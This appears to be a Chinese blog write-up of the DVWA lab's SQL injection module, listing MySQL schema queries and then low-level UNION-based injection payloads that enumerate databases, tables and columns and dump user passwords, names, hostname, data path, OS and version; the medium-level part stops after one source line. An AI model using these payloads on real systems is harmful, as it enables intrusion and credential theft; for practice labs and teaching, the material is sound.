DVWA-----sql注入模块

2022-10-11 17:43:12

concat        把多列结果拼接成一列  中间无间隔符

concat_ws       把多列结果拼接成一列  中间有间隔符

group_concat     把多行结果拼接成一行,


1.show  databases;//查看所有数据库
2.select  database();//查看当前数据库

3.select  schema_name  from  information_schema.schemata;            //查看所有数据库
4.select  table_name       from  information_schema.tables  where  table_schema=‘dvwa‘;//查看数据库dvwa的所有表
5.select  column_name   from  information_schema.columns  where  table_schema=‘dvwa‘  and  table_name=‘users‘;

                                        //查看数据库dvwa中users表的所有字段
6.select  user,password  from  dvwa.users;                    //查看用户名和密码的内容
7.select concat(user,password) from dvwa.users;       //无间隔符拼接多列结果
8.select concat_ws(0x7e,user,password) from dvwa.users   //有间隔符拼接多列结果
9.select group_concat(user,0x7e,password) from dvwa.users;  //拼接多行结果为一行,每行以逗号结尾

 

 

低级别-

输入 1,页面正常回显数据。

DVWA-----sql注入模块

 

当输入 1’时,页面报数据库参数错误。如图所示,由此可以判断此处注入类型为字符型。

根据报错信息 可以看出构造的闭合条件,可以看出多了一个‘

DVWA-----sql注入模块

构造万能密码  DVWA-----sql注入模块

 

 

 

 

 输入1  or  1=1     没有列出整个列表

DVWA-----sql注入模块

 

 

 

 

 

 1‘   or   ‘1‘=‘1      列出整个列表

 

DVWA-----sql注入模块

 

 

输入   1‘ and 1=1 #   回显正确

DVWA-----sql注入模块

 

输入    1‘ and 1=2#   什么都不显示

 

得知  构造的闭合为 1‘

 

 

首先判断列数

1’  order by x

DVWA-----sql注入模块

 

 

 

DVWA-----sql注入模块

 

 

得知有俩列。

 -1‘ union select 1,2 #   ,

判断回显位置

DVWA-----sql注入模块

 

 

显示当前数据库     -1‘ union select 1,database() #

DVWA-----sql注入模块

爆库    -1‘ union select 1,  schema_name  from  information_schema.schemata #

 

DVWA-----sql注入模块

爆库    -1‘ union select 1, group_concat(schema_name)  from  information_schema.schemata #

            拼接多行结果为一行,每行以逗号结束

 

DVWA-----sql注入模块

 

爆表   -1‘ union select 1,table_name  from  information_schema.tables  where  table_schema=‘dvwa‘  #

DVWA-----sql注入模块

 

 

 

 

爆表      -1‘ union select 1, group_concat(table_name)  from  information_schema.tables  where  table_schema=‘dvwa‘  #

 DVWA-----sql注入模块

 

爆列     -1‘ union select 1, column_name  from  information_schema.columns  where  table_name=‘users‘  #

 

 DVWA-----sql注入模块

 

爆列     -1‘ union select 1, group_concat(column_name)  from  information_schema.columns  where  table_name=‘users‘  #

 

 

 DVWA-----sql注入模块

 

 

爆字段   -1‘ union select 1, password  from  dvwa.users  #

 

DVWA-----sql注入模块

爆字段   -1‘ union select 1, group_concat(password)  from  dvwa.users  #

 

 DVWA-----sql注入模块

 

concat        把多列结果拼接成一列  中间无间隔符

concat_ws       把多列结果拼接成一列  中间有间隔符

group_concat     把多行结果拼接成一行,

 

-1‘ union select 1, concat(first_name,last_name)  from  dvwa.users  #

 

 DVWA-----sql注入模块

 

-1‘ union select 1, concat_ws (0x7e,first_name,last_name)  from  dvwa.users  #

DVWA-----sql注入模块

 

 

 

 

 -1‘ union select 1, group_concat(first_name,0x7e,last_name)  from  dvwa.users  #

DVWA-----sql注入模块

 

 

 列出主机名,  数据库路径, 操作系统。

 -1‘ union select 1, group_concat(@@hostname,0x3a,@@datadir,0x3a,@@version_compile_os)#

DVWA-----sql注入模块

 

列出数据库,  当前数据库版本,  最近用户

 -1‘ union select 1, group_concat(database(),0x3a,version(),0x3a,current_user())#

DVWA-----sql注入模块

 

 

 

 

中级

查看源码

    $id = mysql_real_escape_string( $id );

DVWA-----sql注入模块

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

DVWA-----sql注入模块

上一篇:MySQL数据库基础及sql命令了解


下一篇:【MySQL】借助binlog排查一次生产问题